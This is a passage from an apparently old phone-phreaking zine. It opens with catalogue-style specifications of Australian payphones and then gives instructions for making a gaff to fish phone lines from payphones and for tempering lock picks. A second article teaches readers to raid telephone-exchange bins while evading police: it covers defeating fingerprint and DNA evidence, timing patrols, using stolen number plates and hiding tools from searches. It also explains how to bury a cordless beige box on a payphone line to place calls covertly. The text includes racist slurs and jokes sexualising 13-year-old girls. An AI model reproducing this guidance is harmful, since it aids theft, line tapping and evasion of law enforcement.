Almost half a year ago, whilst researching various exotic payphones available around Australia, I came across the PayTel S400 Satellite Payphone. Although I have never seen one let alone operated one before, I can provide you with quite a detailed amount of information on it (all of which I obtained from their website and am essentially presenting here as a means of preservation and future reference). If any of you Melbournites ever come across any of these, or anyone across Australia for that matter, have a good look at them, try various things and email me with some constructive information (Do they ring? Do tonediallers work on them? Is the handset muted for incoming calls? Are there any barred services and so on).

PayTel payphones are generally found in a variety of locations and are designed for providing remote locations with telephone communication. They utilise wireless technology (Analogue / Digital; Cellular Radio, and/or Satellite) to provide these services in "mobile environments" or where wire connections are not available. They can operate on both credit and phonecards - PayTel is the holder of ISO financial card IIN [I]ssuer [I]dentification [N]umber 836 600. The phonecards use Magnetic Stripe technology encoded with a proprietary data system unique to PayTel. Charges for calls Australia-wide and each of 4 ISD call zones are uploaded into each S400 by data signalling from the PayTel office (think, Telstra MTMS updates).

Locations where PayTel S400 Satellite Payphones can be found and are applied include: Military; Coaches; Outback Tours; Oil Rigs; Trains; Freighters; Mining Camps; Roadside Assistance; Isolated Communication; Liners; Remote Events and Emergency Locations.

PayTel is an entirely Australian owned company and claims to be the only group providing payphones actually designed and manufactured here.

Pay∑Tel Australia Pty Ltd
PO Box 456 (4/43 Railway Road)
Blackburn, Victoria 3130, Australia
Phone: (03) 9877 0222, Fax: (03) 9877 9499
Email paytel@melbourne.net


S400 Satellite Payphone - Overview:

  • 3rd Generation Coinless Payphone (based on Mk II satellite & cellular payphones supplied to numerous railway operators across the country)
  • "Flash" Memory - payphone operator can change/set phonecall rates, eg.
    • Subsidy $1 p/min
    • Cost $2 p/min
    • Profit $3 p/min

  • Features benefits of chosen CAPSAT telephone (phone/credit card phone)
  • Payphone Diagnostics performed remotely (data signalling from PayTel office)
  • Allows for pre-paid phone calls
  • Operates via Thrane & Thrane Capsat telephone as well as "Inmarsat
  • Constructed of strong steel
  • LCD (20 x 2) display: Call Duration & Charging Information
  • Call payment options: credit cards & pre-paid smart cards (phonecards)
  • Payphone Management System provided by PayTel


Further Specifications & Details:

  • Measurements: 100mm x 300mm x 380mm (depth x h x w)
  • Weight: 5 kg (incl. CAPSAT unit)
  • Power: 200-250v AC / 12v DC.
  • Solar Power (optional)
  • Connection: Voice port & data port, CAPSAT TT-3060, TT-3062A, TT-3062B
  • Fittings: CAPSAT unit can be housed in the payphone or separately
  • Placement: 4 x 5 mm holes at rear for wall mounting
  • Marine protection: Fully cod plated
  • Maintenance: Maintenance free, only requires hygiene cleaning
  • Call payment: Visa, Mastercard, Bankcard or PayTel phonecard
  • Authorisations: Credit Card data sent via modem to PayTel Processing Unit
  • Phonecard personalisation (optional at extra charge)
  • Cost of service: 10% credit cards, $6.00 phonecards
  • Call charging: Variable according to owner (1 minute increments)
  • Call cost: As per Telstra standard billing
  • Call information: Duration of call, call cost & remaining call time credit displayed on LCD
  • Enviromental resistance: Indoor application only (recommended)
  • Coverage: World-wide Inmarsat coverage according to CAPSAT data supplied separately
  • Usage: Graphically indicated on payphone. English language prompts and information on LCD
  • Customisation: Call charges, card information and other variables according to the owner
  • Cards: Compliant with ISO 7811; PayTel holds IIN 836 600

Appendix 2 - Siemens Payphones Australia

"The company is currently the sole supplier to Telstra of owner operated payphones."

- Siemens


I. Cityphone Compact

The Cityphone Compact is a Multi-chipcard & coin payphone. Siemens claim that their new phone model is "world leading technology" but has not yet been released in Australia at this writing. Quite a sexy phone I might add, silver and sleek (uses Abloy keys I see) but has the same handset as the Siemens Elasa (better known as the Telstra X2 Smartphone). Since they are not yet on the market I am going off what was written at the site re-worded in some cases (See Resources & Links).

(i) Semi-supervised multi-chipcard & coin [Indoor] payphone

  • Line-powered payphone for coins and all kinds of chipcards
  • Integrated security modules
  • S-PMS support & software download
  • Visually & mechanically compatible with TSP/TMI
  • Modular field upgrades from coin to combinations


(ii) Features

  • 2 wire analogue telephone line interface
  • DTMF & Pulse dialling
  • allows Incoming calls
  • Card change function during call
  • Various Langauge user messages
  • Free to Caller numbers list
  • Barred numbers list
  • Remote charging
  • Self-charging based on polarity reversal (PTT optional)
  • Up to 5 coin escrow Upper compartment electronically controlled


(iii) Coins

  • Coins escrow
  • Remotely programmable electronic coin validator
  • Escrow capacity: - 4 coin sequential access - 5 coin random access
  • Integrated Coin box (700 cc capacity)
  • External coin box optional (2000 cc capacity)
  • Electromechanical coin entry slide


(iv) Chipcards

  • Chip cards with or without enhanced security algorithms (e.g. SLE 4 43X)
  • Electronic purse microprocessor cards


(v) Security Features

  • Up to four security modules
  • Offline operation
  • Cryptographic authentication between chip card and payphone
  • Reliable store of the charged units
  • Black/white list storage
  • Integrated anti line tampering unit


(vi) Statistical Data

  • Income (charged quantity)
  • Number of calls
  • Number of invalid telephone cards
  • Management System availability
  • Other requirements


(vii) Maintenance Features

  • Full diagnostics and tests capabilities
  • Menu driven program for guided field maintenance
  • Displaying of faulty elements, alarms, parameters and statistics
  • Maintenance personnel identification
  • Failure clearance reports


(viii) Management System

  • Compatible with existing management system (S-PMS)
  • Integrated 2400 bps modem
  • Parameters up- and downloading
  • Software download
  • Download of security access keys


(ix) Technical Characteristics

  • Process Capacity
    • 16 bits microprocessor
    • 4 Mbits Flash EPROM memory
    • 32 kBytes EEPROM memory
    • 4 Mbits RAM memory

  • Power supply
    • Telephone line powered

  • Communications
    • Integrated 2400 bps modem

  • Keypad
    • CCITT standard numeric keypad.
    • Function keys
    • Hot keys

  • Card reader
    • Conforms to ISO 7816-2

  • Operating environment
    • Temperature range - 20 °C to 60 °C

  • Display / Instructions plate
    • 2 line LCD display with 2x20 characters


II. Easyset Entry

Another payphone soon to be released on the Australian market by Siemens is their latest Indoor coin payphone, the Easyset Entry. All information included here is either quoted or r-eworded from data supplied online from websites found after extensive researching.

This boy in dark-blue comes with optional Integrated Anti Line Tampering security features, which makes for quite an interesting adversary. Please note that any of these "not yet released on the market" payphones are bound to appear in various locations across the country over the next few years, so keep an eye out and keep me posted via email or on the BBS.

(i) Indoor coin payphone; entry model - Features

  • 2-wire analogue telephone line interface
  • DTMF & pulse dialling
  • allows Incoming calls
  • 4 different languages for user messages
  • Barred numbers
  • Free to Caller numbers
  • Charging pulses (CLM)
  • Self charging with polarity reversal (Push to Talk option)


(ii) Coins

  • Remotely programmable coin validator
  • Escrow coin storage capacity (2 options):
    • 4 coins escrow in sequential mode
    • 5 coins escrow in random access mode

  • Integrated cash box
  • External coin box (optional)


(iii) Security Features

  • Reliable collecting scheme
  • Integrated Anti-Line Tampering (optional)
  • Metal Coin Module


(iv) Statistical Data

  • Amount collected
  • Number of calls
  • Management system access
  • Fast dialling keys
  • Additional statistics can be implemented on request


(v) Maintenance Features

  • Full diagnostics and test capabilities
  • Menu-driven program for guided field maintenance
  • Display of faulty elements, alarms, parameters and statistics
  • Failure clearing reporting


(vi) Management System

  • Compatible with existing management system (S-PMS)
  • Modem with 1200 bit/s
  • Up- and downloading of parameters


(vii) Technical Characteristics

  • Processing Power
    • 8 bit Microprocessor
    • 64 Kbits Flash EPROM
    • 32 kBytes EEPROM
    • 32 Kbits RAM

  • Power Supply
    • Line-powered

  • Communications
    • Integrated 1200 bit/s Modem (V23)

  • Keypad
    • Standard numerical keypad (CCITT/ITU)
    • Function keys
    • Fast dialling keys

  • Operating Range
    • Temperature Range: from 0 °C to +50 °C

  • Display
    • 2 lines LCD display with 24 characters/line.

III. Telstra Interset 751

Siemens example of "world leading technology" already available in Australia. A No-Coins payphone that deals in the latest generation of chip cards. I have not yet seen any of these around but they are said to be suited to hotels and hospitals and is obviously the reason why. They look like a dark blue Optus housephone with a Bright Red handset and a chip card sticking out diagonally on the top right-hand corner. Interestingly, this one also has anti line tampering modules.

(i) Desktop payphone for latest generation chip cards

  • Analogue chip card telephone with integrated anti line tampering modules
  • Bundled with hotel application
  • Free flowing data port
  • 12 kHz metering or behind PABX
  • MTMS support & software download
  • Refurbishment option to "as-new" standard for post-Olympic period


(ii) Features

  • Analogue telephone line interface
  • DTMF & pulse dialing
  • accepts Incoming calls
  • Number redial
  • Change of card during a phone call
  • 4 languages
  • 8 Hot-line keys
  • Storage of barred numbers
  • Storage of non-chargeable telephone numbers
  • Charge pulse evaluation 16 kHz (12 kHz optional)
  • Self tariffing (optional)
  • Data socket


(iii) Cards

  • Memory cards with algorithm (eg SLE 443X)
  • Microprocessor cards with electronic purses


(iv) Security Features

  • Up to 3 security modules (eg SLE 44C80)
  • Off-line operation
  • Cryptographic authentication between chip cards and terminal
  • Secure debiting of call charges
  • Reliable storage of charge sums
  • Storage of black/white list for cards
  • Anti line tampering integrated


(v) Statistical Data

  • Revenue
  • Number of calls
  • Invalid telephone cards
  • Availability of the management system
  • Use of hot-line keys


(vi) Maintenance Features

  • Full diagnostics and tests capabilities
  • Menu driven program for guided field maintenance
  • Displaying of faulty elements, alarms, parameters and statistics
  • Maintenance personnel identification
  • Failure clearing reporting


(vii) Management System

  • Compatible with MTMS Management System
  • Modem communication 2400 bit/s
  • Parameter upload/download
  • Software and firmware download
  • Key download to security module


(viii) Technical specification

  • Processing Power
    • 16 bit microprocessor
    • 4 Mbit Flash EPROM
    • 32 Kbytes EEPROM
    • 4 Mbit RAM

  • Power supply
    • Telephone line powered

  • Communication
    • Integrated modem 2400 bit/s

  • Keypad
    • Numeric keys CCITT standard.
    • function keys
    • Hot line keys

  • Card reader
    • Conforms to ISO 7816-2

  • Operating environment - Temperature range 10∫C to 40∫C
  • Display
    • 2 line LCD display with 2x24 digits


IV. Diamond (L6 Bluephone)

Made popular at tens of thousands of locations across Australia, from Swimming Pools to Newsagents, Chemists, 7-Eleven and other numerous Convenience Stores, Universities, Schools, Pubs, Petrol Stations and a host of different "indoor type" locations where these Customer Operated coin-only Payphones are in use. Marketted by Telstra as the Bluephone, it has been available in Australia since 1988.

Siemens Communications Pty Ltd
Cnr. Herring and Talavera Rds
North Ryde NSW 2113
Australia
Mail: Locked Bag No. 2500
North Ryde NSW 1670
Phone +61 137 222 Fax +61 1300 360 222

(i) Features

  • Aluminium diecast casework
  • Fraud resistant (haha)
  • All models suitable for wall or desk mounting
  • Electronic coin validation for 4 different coins
  • Local, long-distance, international, free, barred and operator facilities
  • Follow-on Button
  • Decadic (Pulse) / DTMF dialling (payphone identity tone, credit expiry tone)
  • Line powered (no mains req.)
  • Self diagnosis of faults
  • Owner mode facility allows operation as a normal phone
  • Hearing aid facility. Fitted with an inductive coupled hearing aid adaptor
  • 16-character display
  • Dimensions: 245mm x 180mm x 310mm (w x d x h)
  • Weight: 5 kg
  • Operation Range: 0 to 45 degrees Celsius, 10 to 70% RH
  • CLM - Called subscriber answer indicated by 50Hz / 12kHz meter pulses.
  • Tariff Changing: Pre-set by factory or changed by the owner from the keypad
  • Accepts Incoming calls (has loud ring-tone)
  • It is possible to do a 1800-REVERSE call from one Bluephone to another


(ii) Security

  • Access to the mechanism compartment and cash container is via a single keyswitch. A 3rd position on this keyswitch allows use of the equipment as an ordinary telephone. Cash container capacity 1 litre.


(iii) Coin Handling:

  • In-line escrow, capacity 4 coins. Coins are cashed as they are used, in the order in which they are inserted. Unused coins are returned.

V. Elasa (Telstra X1/X2)

Manufactured in Spain, the Elasa model was originally designed for indoor use only but Telstra has utilised it as both an outdoor and indoor semi-supervised location Payphone. MTMS updates are constantly barring certain numbers that phreakers find and exploit excessively (publicly announcing "sensitive" numbers on places such as a BBS is highly frowned upon - this was how the iPrimus DCX and FAST were barred). There are numerous Workarounds publicised by Zaleth in his article and the Method for Un-muting an X2 Smartphone Handset are also included in numerous articles and is the reason for why it is not included here.

This particular subtitle was included to merely record various other information about the Elasa payphone as well as a list of currently known facts about X2's. The Smartphones are constantly being updated, some are of course not and so the differences vary according to location and other factors.

Facts:

  • (a) The Ringtone: Yes, it is true that *some* X2 payphones have an initial two-tone chime to indicate that there is an incoming call. The vast majority *do not* have any sort of ringtone.
  • (b) The Un-Mute: Yes, it is possible to un-mute the handset (refer to numerous other articles detailing this method).
  • (c) Calling other X2's: It is possible to call other X2 payphones from an X2 and un-mute the handset for two-way communication. Of course there may also exist some X2's that have this capability barred.
  • (d) Calling TriTel XP1230's: *Some* X2's are barred from calling TriTel payphones.
  • (e) Workarounds: Yes, these do work and are necessary if you wish to call FAST or the iPrimus DCX.
  • (f) Tonediallers: Some X2's will only accept tonedialler DTMF if at least 1 digit has been pressed on the actual keypad, others do not accept tonediallers at all.
  • (g) DTMF Time-delay: Almost all X2 Smartphones have a time-delay between pressing the number on the keypad and hearing the actual DTMF being played down the line (this only occurs after several digits have been pressed). It is possible to find some X2's that are not updated and do not have this annoying feature, they simply play the DTMF the moment you press the keypad for as many numbers as you dial.
  • (h) Straw-trick: This is pathetic, old and does not work any longer. The vast majority of payphones will not let you complete the call after $1.50 or so has been used up in credit (the line is disconnected and ERROR appears on the screen). I'm am quite sure that it isn't even possible now to do the straw-trick even for that minimal credit (it's been so long...)
  • (i) MTMS: this is dialled up automatically by the phone when an excessive amount of unconnected 1800 numbers have been dialled sequentially.

Appendix 3 - DORO Zircon Payphones

The DORO Zircon is an Indoor Coin-Only type Customer Operated payphone and can be found in a number of places, particularly Clubs, Restaurants, various Shops, Hotels and so on.

DORO Zircon Specifications:

  • Exterior: White ABS plastic; compact design; ergonomic handset
  • Four memory buttons for fast access to local business
  • Redial; Follow-On; Volume Control; Multilingual selection
  • Accepts 20c, 50c $1 and $2 coins
  • Can be programmed to accept any new coins introduced in the future
  • Raising pip on fifth digit to aid the visually impaired
  • Can be affixed to a wall or desktop mounted
  • Large cashbox capacity
  • Backup battery with five-year life
  • Liquid crystal display (single line)
  • Help-desk coupled with self-diagnostic facility
  • Hearing aid compatible
  • Rather loud ringtone
  • When called, the line connects as soon as the receiving party lifts the handset


DORO Zircon MX Specifications (includes those above)

  • 2mm secure Steel Jacket
  • Secure Cashbox Drawer

The majority of this information was taken from the following webpage, which also includes pictures of these Indoor Coin Payphones:

http://www.activeelectronics.com.au/doro/doro.html


Appendix 4 - Vector Technology Corporation (VTC)

VECTOR Customer Operated Payphone's (VT-200M) are found in a majority of places throughout Sydney, particularly associated with Newsagents, Phone stores and other venues in the Chinatown district. They have now spread across the entire city and can be found just as easily in the suburbs. Be it in secure, semi-secure and outdoor locations, they are in in more than 80 countries worldwide.

Vector Technology Corporation
7F, No.87 Chung-Yang Rd, Sec. 3
Tuchen Taipei Taiwan
Tel: (886 2) 22678080 Fax: (886 2) 22678181
Email:sales@vector.com.tw
Key Contact: Mr Joe Ran MANAGER

The payphone itself is slightly larger than the Siemens Diamond model (or as it is more commonly known, the Telstra L6 Bluephone). The VTC's found commonly in Australia are in dark purple ABS Plastic but Vector Technology also release models in Yellow, Green, Brick-Red, Crimson-Red, Cream and so on. The dark purple model is known as the VT-200M and are Coin Only (they are also designed to accept cards, but I have not come across any with this feature activated as yet).


VT-200M (VTC Coins-Only Payphone) - Specifications:

  • Power: line Power
  • Call Limited: Local, STD, IDD, Internet Gateway Acces - (Minimum insertion options)
  • Call Area define: Local 300 sets, STD 300 sets, IDD 400 sets
  • Function Button: Hot line, Barred, Emergency Call.
  • Coin release: Avoids coin channel being blocked.
  • Tariff Rate: Self Tariff, Or System Tariff by Meter Pulsed 12Khz / 16Khz / 50Hz) - Interfaces with all existing metering signals (Tariff Rates programmable)
  • Service Charge, minimum charge.
  • LCD 16 Character - Multipurpose display
  • Coin Definition: Max 12 Kinds - Smart coin collection - Multi-coin operations
  • Microprocessor Controlled
  • Electronic coin diameter validator (VT-100); Electronic permeability validator (VT-200)
  • Self-diagnostics; Cash Box Monitoring; Coin Jam Release
  • Coin recognition: diameter, Material
  • Tariff Change: By Keypad / By Remote Control System
  • Income Monitor: By Keypad / By Remote control System
  • Discount Time: 24 Period (Real Time Clock Request)
  • Metal CashBox: default 300Pic, External 2000 Pic
  • Frame: ABS Plastic
  • Desktop / Wall Mouted
  • Access to PABX Systems
  • Size: 245mm x 183mm x 315mm (w x d x h)
  • Weight: 3.5 Kg


Optional Extras:

  • GSM 900/1800/1900 Mhz Triple Band Module
  • IC Card Option
  • Real Time Clock
  • External Cash Box


Function List:

  • Function 00 - Self-Diagnosis
  • Function 01 - Local / STD /IDD block control
  • Function 02 - Local/STD/IDD code/rate input
  • Function 03 - Tone/Pulse selecting
  • Function 04 - Duration for incoming call
  • Function 05 - PBX mode setting & Barred code setting
  • Function 06 - Warning time setting
  • Function 07 - Hot line program (2 sets)
  • Function 08 - Accumulation of coins
  • Function 09 - Coin recognition program (6 different coins)
  • Function 10 - Money or time display & metering Signal selecting
  • Function 11 - Owner's password program
  • Function 12 - Cashbox monitoring password program
  • Function 13 - Language Mode program (2 languages)
  • Function 14 - Taxed rate & rate's program for value
  • Function 15 - Rate's program for timing
  • Function 16 - Data copy program
  • Function 17 - Speed dial program (10 sets)
  • Function 18 - Auto detection (optional)
  • Function 19 - Real Time clock setting (optional)
  • Function 20 - Reduce price / periods program
  • Function 21 - Carrier Setting (reserve)
  • Function 22 - Date off & service program
  • Function 23 - Password program
  • Function 24 - Simple discount
  • Function 25 - 0+ program (optional)
  • Function 26 - RMS
  • Function 27 - Version no.
  • Function 28 - Cashbox / Volume Selecting
  • Function 29 - Internet Gateway Access


VT-200M Additional Information:

  • (a) Call cost is generally 50 cents per local call, $1 initial call to mobile phones.
  • (b) Buttons: Follow On, ReDial, Loud.
  • (c) Payphone line: Standard Flat 4 Core Telephone-style cable, [Austel Approved].
  • (c) 50 cents must be inserted in order to place a 1800 call, the vast majority of VTC phones I have come across will actually charge you for placing that call - a few simply return the money.
  • (d) When attempting to dial a 1800 number without money the first digit registers and the DTMF for 1 is played down the line. However, the following 7 numbers (ie. 800-xxx-x) will not register, after which the phone resets and asks again for 50 cents. A mobile phone used as a tone dialler will not work, even after one button is pressed on the keypad. The "Follow On & ReDial" Workaround pertaining to X2's will not work either since the VTC will only register the initial DTMF tone if no money is placed in.
  • (e) VTC payphones can be rung and the line is connected as soon as the receiving party lifts the handset. The ring-tone is similar to that of the L6 Bluephone only slightly higher-pitched and louder in some cases.

Appendix 5 - Metalwork, Heat Treatment, Tempering

I. Silver Solder Gaff

You can purchase pieces of Silver Solder from Hardware supply stores, particularly the larger ones as many of the regular BBC stores in your local area may not actually stock any of it (you'd be surprised). Silver solder is quite literally, solder containing silver - and is a long piece of solder about 3 millimeters in diameter and usually found about a metre long. It is easily recognisable in a brown or shiny grey-brown colour and much more stiffer than flimsy wire coat-hangers or other similar pieces.

A gaff, by definition, is a device for hooking fish; but in the phreaking sense I apply my miniaturised-gaff device to "fishing" phonelines out from the back of payphones, particularly the TriTel XP1230's as they are accessible this way (the stands are sometimes an inch off the wall). Since pieces of silver solder can be quite long it is effective; an accomplice can stand beside you and hold the gaff in place while you have access to the line and do what you will.

  • Using a strong and larger pair of pincers bend the silver solder at a point no more than a few inches from one side (as you do not want to lose too much of its overall length). It may take some effort in straightening and bending (sometimes a hammer can assist in getting it to the right angle) so that two halves are parallel with one another and there is roughly 1 cm of gap between them (this provides the perfect hook shape at the bend).
  • With the same pair of pincers clip off the shorter half right at the point where the bending stops. Make sure that any sharp edges are smoothed. Keep the long section as straight as possible since it can be quite frustrating attempting to fish for phonelines with a crooked gaff.
  • A pathetic ASCII drawing is provided here for my amusement and also your own. Enjoy. NB. this picture is *greatly* reduced in size.

II. Lock Picks

While this topic is not entirely related to anything else in the article, it was put in firstly as a prelude to a future article covering this area; and secondly since the methods for tempering and manipulating metals applies to both the construction of gaffs and picks. I will attempt to apply the metal treatments for lockpicks to making a perfect gaff (for the obsessed).

Constructing a strong torque wrench is done by choosing a nail that suits the various locks you have been studying. Nails which are roughly .25 cm in diameter, once turned into a torque wrench, suit a majority of locks you may come across. Please note that some Lock Picking articles online refer to the "torque" wrench as a tension wrench. Utilising a propane torch to heat up the nail is ideal, once it glows red gradually remove it from the flame and allow the air to cool it down - this basically softens the metal. You can apply this to the silver solder for making your gaff.

  • At the point at which you intend on bending the silver solder for producing the "hook" tip apply a propane torch flame (or gas stove flame if possible) to the area until it turns red as one does when preparing the torque wrench. Once the silver solder has cooled in the air it is soft and easily manipulable.
  • Bend the silver solder at the softened point so that two halves are parallel with one another and there is roughly 1 cm of gap between them (exactly as you would in the I. Silver Solder Gaff description).
  • With a strong pair of pincers cut off the shorter half right at the point where the bending stops (exactly as you would using the more crude method of gaff construction detailed in I. Silver Solder Gaff above).
  • To harden the hook, now that it has been neatly bent and excess silver solder cut off, you will have to temper it by heating the hook end with the propane torch or gas stove flame till it is bright orange. Once it has reached this state immerse the heated portion in a bucket of ice water. You will end up with one of the strongest and finest constructed Silver Solder Gaffs around.
  • NB. Make sure that the hook-tip is not too sharp, grind it smooth or flatten it and file down the edges manually (you dont want to be "fishing" a line to see if it is the power source or phone cable and end up peircing the insulation!).

Resources & Links

Some of the information included in here was obviously obtained from online sources that I personally researched and has been mainly paraphrased, re-written in comprehensive terms to partially quoted. These pertain to the payphones that I was not able to get physical access to (particularly the PayTel S400 and the four new Siemens payphones).

* Siemens
http://www.siemens.com.au/sections/p_s/ic/ic_payphones/ic_payphones.html

* Pay∑Tel Australia
http://www.paytel.com.au/

* DORO Zircon
http://www.activeelectronics.com.au/doro/doro.html

* Vector Technology Corporation
http://www.vector.com.tw/profile.htm
http://showcase.cetra.org.tw/comdex/search/search.asp?midclass=2230&page=11
http://showcase.cetra.org.tw/comdex/search/company.asp?ban=84514030&prodseq=14844&SchClause=midclass%3D2230%26page%3D11

* TrendTek Australia
http://www.trendtek.com.au/

* Protel International
http://WWW.PROTELINC.COM/PROTELInt/INDEX.HTM

Perhaps this will serve to show neophytes entering the scene and wondering how they can start learning more, that the value of research is immeasurable. It may take hours, even days before you find what you are looking for, but the rewards far exceed the cost. The most useful search engine of them all in my own opinion is the wondrous http://www.google.com/

-=-=-=-=-=-=-=-=-=

Until next time, Addio miei amici. I hope you enjoyed the article and found it as helpful as it was informative. Positive feedback is always appreciated.

~pHreakazÿid~

-=-=-=-=-=-=-=-=-=

>eof<

[07] Paranoia & Being Paranoid Pt.1

[head_rush]


What It Means

par∑a∑noi∑a
n.

  1. A psychotic disorder characterized by delusions of persecution with or without grandeur, often strenuously defended with apparent logic and reason.
  2. Extreme, irrational distrust of others


par∑a∑noid
adj.

  1. Relating to, characteristic of, or affected with paranoia.
  2. Exhibiting or characterized by extreme and irrational fear or distrust of others: a paranoid suspicion that the phone might be bugged.


n.
One affected with paranoia.

Being paranoid to me just means being smart, wising up, not being stupid and giving out unneccasry information or bragging about shit. Nowadays there are so many ways that you can be traced, information gathered about you and the like. While most this happens while being online, most, if not all phreakers come online for resources, discussion, study or just general browsing. This is where everybody is most vulnerable.


Paranoia In The Field/ Off Line

This is probably the most dangerous area, especially if you are into trashing, where you can be caught in a rubbish bin with pieces of paper in your hand. Scanning is also another place where people can get suspicous, why would a person need to stand in a phone booth, dialing number, writing something down, then dialing again, just doesn't make sense.


Trashing

This isn't going to tell you how to trash, rather tell you safer methods of doing so. What you wear is very important, don't wear all black because:

  • a)you look like a goth and they suck and
  • b) it does look a bit to suspicous, but then again don't dress in cricket whites because they are easy to spot. Wear darkish coloured clothes- browns (does anybody wear that colour), navy blues, dark blues and the like.

Caseing out the place that you are going to trash does take more time, but it could help you from getting caught in the end. Pick an exchange that is a close travelling distance from your house, but not right near it, make sure it is away from bacon station's. I know of one exchange, where my shack is located where the pig station is right next door to the exchange. When caseing out the exchange have a look if the bin has a lock on it or not, this might save you having to bring tools along. If the exchange has a park, or something similar hang around there, and pull 13/f/jap on the little kids... I mean watch the exchange to see if there are any passing patrols or rent a cops that go past. If so note these times, and make sure you come back to trash in between these times.

When you have decided on a time, its time to pack up and get ready to go. Try and take as little tools as possible, if you know there is no lock, don't take a lock picking set. If there is a lock, try lock picking techniques on it, as cutting the lock is suspicous and they will wise up to what is happening. Take a pair of gloves, like the densists/docotrs use, or what some people use to serve food(This is a document about being paranoid right.) If the cops do get called in they will most probably fingerprint, if you are way way paranoid, wear a hat or something to stop hair falling out, this would help to minimise chances of DNA testing(also watch out for sweat, skin, anythig like that). I read somewhere about wearing a pair of shorts underneath your pants and putting the gloves in there, so that even if you are patted down then they feel like part of the material. If you do need to take tools hide them as well as possible, lock picks in the bottom of a backpack under a flap, or a set of books or something similar, where they will most likely be missed in a search. A torch, or felt pen is a good place to hide small equipment inside, the torch then can be used to help search for stuff in the bin(carry "spare" batteries somewhere else).

Trashing in a group is a good way to increase security and make the job a little bit easier. If you are walking the streets late at night by yourself, then it can be a little unsafe(espically for all you 13 year old acne faced kids). Being in a group gives you the security of not being attacked, but also a curious resident or passer byer will be more unlikely to go up and question a bunch of people rahter than a singular person. You can also have one person on look out in the street(having a smoke or something similar), while the other two go in and trash the exchange. It is possible to talk walkie talkies to have conversation with, but these are a) noisy and b) suspicous if you do get searched/questioned on the way there. You could get way pro and buy some throat mikes or something, but if you have the money spend it on something else. The best way for the lookout person to warn the trashing guys is with a whistle or a noise, that would most probably sound natural. The lookout person should have no tools or weapons, because if he gets searched/questioned then he will most unlikely not be hassled too much.

Getting to and from the exchange can be done by several methods: car- fast, good to get away in, but the license plates/colour, make of car can be easily traced. If you know somebody with a wrecking yard, see if you can go in and get a set of plates. White and red cars are the most normal cars, and commodore and ford make up the greatest slice of cars. If you are a P plater make sure you take those down before going to the exchange as they very noticable by residents. Make sure you park a distance from the exchange, parking with cars of the same make/colour is also a good idea. Bike- Not as easily traced as a car, but also slower and harder to move if you have a large amount of "booty"(no not blek arse, I mean stuff from the exchange). While these can go places cars can't, and also pretty fast downhill, they also go shit slow up hill. So if you do decide to use bikes as your form of transport make sure your exit route is on the level/downhill. Walking- While being silent, and the easiest and vary low in suspicous level, it is a damn slow method espically if you are being chased by bacon/rent a cop. The good thing about walking is there no mode of transport that can be traced back to you. Other methods I have heard about are rollerblades, skateboards, etc. etc.

If large enough exchange/bin area you should really have an entry and exit route, and if possible have an emergency route, I know this sounds over the top, but we are being paranoid here. Rather than placing all your "bootY" into plastic bags, where they can make noise, and you look rather suspicious walking around with garbage bags in your hands. What I would suggest is a large backpack(makes it easy to walk/run with, and also to ride with). One of those day packs(for bushwalking) would be ideal as it has alot of space, I don't mean to take a 80 litre pack, as you would look like a tool, but rather the ones that people use at school/college/university. The information that is useless/you don't need make sure you burn it, hell i would even suggest scanning the stuff that you find interesting, encrypting it and burning the hard copies, but that is just me being paranoid. If you do keep hard copes, make sure they are in a safe place, off your propetry would be a good idea, and have someone that you know destroy if you get caught.

A final thing that I must add about trashing, I think it is very important to keep everything as normal as poissible, so trash the night beforce, or if possible the same night as trash collection. Then people won't get too worried if their bin is half empty, and all the broken phones and shit are gone... "One man's trash is another man's treasure."


Scanning

Scanning is another place where you are vulnerable to be caught/be interfered with. It is important to spend as little time as possible in the phone booth, as this is where you can be easily cornered. http://www.aca.gov.au/cgi-bin/range_search is a very handy resource where you enter a range of number and it will give you the numbers that are actually connected, this saves you a hell of alot of time at the booth. While it is very handy to write down excatly what comes from the call, just write down an ancryom such as ro for rung out, nc for not connected, etc. etc. This will once again cut down the amount of time that you will haveto spend in the booth. When recording this information down, have it somewhere that doesn't look suspicous, like having it on the last few pages of an old school book. This way if someone comes up to asks you what you are doing, you just look like your doodling on your school book while (pretending to) talk on the phone. Also when writing down the numbers don't write down the whole number such as: 1800 666 666(this is a number for some goth clothing store, handy for trashing), rather just write 666 because you should know what range you are scanning.

Being the paranoid person that I am gets really freaked out dialling numbers in public, and perfer to call at night time, plus after work(night work) was the only time that I had to do it, while there are less people, you do stand out more at night time standing in a lit phone booth dialling numbers for too long. I also like to use different payphones, so say make 20 calls from one, then move to a different payphone, not right next to it, but down the street, or across the block or something like that. Now, in some information that Zaleth gave me I have some shit about MTMS and how it reports on alot of non collectec calls, let me paste the bish here:

"Thursday & Sunday nights between 24:00 and 01:00 Smartphones will do their MTMS updates, generally speaking MTMS sends and recieves data such as Coin, Payphone usage and any updates. If you scan 12 consective numbers which cannot be connected and you hang up MTMS will dobb on you."

So in other words, if you dial 12 numbers in a row that don't connect the payphone will record it. So if you scan say at 11pm every friday night, and you dial 12 number that don't connect(in a row) and this goes on for awhile. Then you might just get suspicous and turn up and 11pm to the payphone that you dial from. By taking advantage of all or some of the above methods you can avoid getting into any shit.

Notice how I haven't included anything on scanning from home, want to know why not? Because it's a fucking stupid idea!! I mean really this is a paranoid text, if your stupid enough to scan from your home phone then so be it, sorry to have wasted your time reading the above section. There are however some different methods which can/could make it possible for you to scan from the ease of your home, or a more comfortable/safe position.

This is an idea that I got from Dataclysm "The mega super happy guide to VMBs and scanning". What the basic idea is that you biege off a payphone line, setting up a cordless biege box. Simply what you do is you set up the base station to the payphone line, then you take the handset back to your house, to some park or somewhere like that. Apparently this only works within 300 metres or so. If you leave further away than this from a payphone then you could build a signal amplifier to obivlosuly make the signal stronger so that it is able to cover a further distance. Now you want to bury this device so that no one can see it, then you want to cover the dirt/grass back up perfect so that people don't get suspicous. Now in another article I read something that could make this even more uber. The article was written by VX0MEG and was entitled "Safer boxing using the RJ31X Jack". Simply this lets you have a domiant line and a slave line, which is great for the boxing kiddies. So what you can do is attach the victims phone line to the dominant "connection" and the biege box to the slave "connection", so what happens your biegeing away calling 1900-13/f/jap and the legit user of the phoneline picks up to order some gook takeaway, you get disconnected(damn bye bye little 13/f/jap). The great thing about this is if we connect it upto the payphone and the biege box, if anyone by chance picks up the payphone then unfortunately we are disconnected. This really shouldn't make too much of a difference to you, because you can dial the number again, the great thing is that nobody is any of the wiser that someone else is using the payphone. Now you haveto be careful, as said above you don't want to go dialling like 600 numbers all in a hurry because even Telstra will get suspicous and send someone to look at the payphone, and they might just find your cordless biege box, and while very hard to trace it back to you, just be careful. Also there are many variations on this idea, you could set up a laptop with a modem to do the scanning.

